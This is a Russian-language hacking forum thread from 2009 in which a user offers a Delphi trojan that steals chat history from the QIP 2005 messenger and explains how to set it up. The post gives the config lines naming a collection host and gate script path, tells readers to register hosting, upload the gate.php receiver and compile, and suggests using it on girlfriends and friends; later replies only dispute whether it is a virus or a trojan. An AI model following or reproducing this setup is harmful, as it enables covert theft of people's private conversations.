PDA

Просмотр полной версии : Тащим историю с QIP 2005


Deymos
26.11.2009, 09:04
Давным давно, в далекой галактике написали такой вот вирус. Данный вирус тащит историю QIP 2005. Я думаю вещь для многих очень нужная (девушки, друзья и т.п.) :D. И так:

1. Скачать вирус, можно по ссылочке: [Ссылки доступны только зарегистрированным пользователям]
Для лучшей работы советую найти и скачать Delphi 7, но можно обойтись и без него!
Нам необходимо отредактировать вирус (точнее его код), это мы сделаем в файле: QIP_History_Sender.dpr

2. Находим строки:
host: pchar = 'rootstation.lx-host.net'; //ваш хост
path: pchar = '/ttt/gate1.php'; //путь к гейту
wait: Byte = 0; //задержка в поиске в секундах. если 0 тогда искать будет без задержки3. Регистрируем хостинг (hostland.su вполне подойдет) и по выданным данным редактируем выше написанные строки
4. Заливаем файл из папки: gate - gate.php (на хостинг)
5. Запускаем файлик compile.bat, если вы ничего не напортачили в коде, то вирус скомпилируется *pivo*.

Желаю удачи, все написанное выше для ознакомления и попадает под статьи УК РФ. Будьте осторожнее!

(с) FuckAV.ru

becensed
26.11.2009, 13:04
я буду не по теме, но скажу: не путайте вирусы с троянами. Хватит уже называть вирусом всё подряд, не путайте терминологию, пожалуйста.
Вирус - это программа, которая ЗАРАЖАЕТ файлы, так он распространяется.
Если ваша прога ничего не заражает, а просто шлет что-либо куда-то, то это НЕ ВИРУС, это простой троян.

pasha7
26.11.2009, 13:52
becensed да все мы это конечно знаем ! Deymos просто образно говорит*pivo*

Deymos
26.11.2009, 17:35
просто запрос идет обычно вирусы, поэтоому и называю вирусом, а не трояном!